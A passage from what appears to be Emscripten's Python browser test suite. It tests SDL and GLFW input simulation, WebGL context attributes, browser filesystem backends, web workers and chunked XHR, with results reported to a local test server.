1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
open(os.path.join(self.get_dir(), 'page.html'), 'w').write('''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
open(os.path.join(self.get_dir(), 'sdl_mouse.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'sdl_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
open(os.path.join(self.get_dir(), 'test_glfw_joystick.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'test_glfw_joystick.c'), '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3']).communicate()
self.run_browser('page.html', '', '/report_result?2')
@requires_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
open(os.path.join(self.get_dir(), 'check_webgl_attributes_support.js'), 'w').write('''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
def test_emscripten_get_now(self):
self.btest('emscripten_get_now.cpp', '1')
@unittest.skip('Skipping due to https://github.com/kripken/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
open('moar.txt', 'w').write(secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
open('moar.txt', 'w').write('aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=mode + ['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-lidbfs.js', '-s', 'NO_EXIT_RUNTIME=0']
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '-s', 'NO_EXIT_RUNTIME=0'];
for mode in [[], ['-s', 'MEMFS_APPEND_TO_TYPED_ARRAYS=1']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + mode + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10;
secret2 = 'b' * 10;
open(self.in_dir('pre.js'), 'w').write('''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
open('file1.txt', 'w').write('first')
if not os.path.exists('sub'): os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
Popen([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js']).communicate()
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
import random
self.clear()
os.mkdir('subdir')
open('file1.txt', 'w').write('0123456789' * (1024*128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024*128))
random_data = bytearray(random.randint(0,255) for x in range(1024*128*10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'], timeout=60)
assert os.stat('file1.txt').st_size + os.stat(os.path.join('subdir', 'file2.txt')).st_size + os.stat('file3.txt').st_size == 3*1024*128*10 + 1
assert os.stat('test.data').st_size < (3*1024*128*10)/2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'], timeout=60)
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'], timeout=60)
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'], timeout=60)
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'], timeout=60)
'''# non-lz4 for comparison
try:
os.mkdir('files')
except:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'], timeout=60)'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
open('data.dat', 'w').write(' ')
run_process([PYTHON, FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM=1'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(path_from_root('tests', 'idbstore.c'), str(stage), force_c=True, args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(path_from_root('tests', 'idbstore_sync_worker.c'), '6', force_c=True, args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'TOTAL_MEMORY=80MB'])
def test_force_exit(self):
self.btest('force_exit.c', force_c=True, expected='17')
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
function keydown(c) {
var event = document.createEvent("KeyboardEvent");
event.initKeyEvent("keydown", true, true, window,
0, 0, 0, 0,
c, c);
document.dispatchEvent(event);
}
''')
self.btest('sdl_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify', '0', '--shell-file', path_from_root('tests', 'sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
open(os.path.join(self.get_dir(), 'sdl_gl_read.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'sdl_gl_read.c')).read()))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL']).communicate()
self.run_browser('something.html', '.', '/report_result?1')
@requires_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_hardware
def test_sdl_ogl(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT=1', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify', '0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_density(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(path_from_root('tests', 'screenshot.png'), os.path.join(self.get_dir(), 'screenshot.png'))
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION=1', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION=1', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
@requires_hardware
def test_egl(self):
open(os.path.join(self.get_dir(), 'test_egl.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', '', '/report_result?1')
def test_egl_width_height(self):
open(os.path.join(self.get_dir(), 'test_egl_width_height.c'), 'w').write(self.with_report_result(open(path_from_root('tests', 'test_egl_width_height.c')).read()))
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'test_egl_width_height.c'), '-o', 'page.html', '-lEGL', '-lGL']).communicate()
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def do_test_worker(self, args=[]):
# Test running in a web worker
open('file.dat', 'w').write('data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.test_port)
html_file.close()
for file_data in [1, 0]:
cmd = [PYTHON, EMCC, path_from_root('tests', 'hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else []) + args
print(cmd)
subprocess.check_call(cmd)
assert os.path.exists('worker.js')
self.run_browser('main.html', '', '/report_result?hello%20from%20worker,%20and%20|' + ('data%20for%20w' if file_data else '') + '|')
def test_worker(self):
self.do_test_worker()
self.assertContained('you should not see this text when in a worker!', run_js('worker.js')) # code should run standalone too
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.test_port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. path_from_root('tests', 'hello_world_gles.c')
run_process([PYTHON, EMCC, path_from_root('tests', c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS=1', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10*chunkSize+1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True,chunkSize,data,checksum,self.test_port))
server.start()
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_hardware
def test_glgears(self):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'], outfile='something.html',
message='You should see animating gears.')
@requires_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(30, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut'] + (['--proxy-to-worker'] if proxy else []), timeout=30)
@requires_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
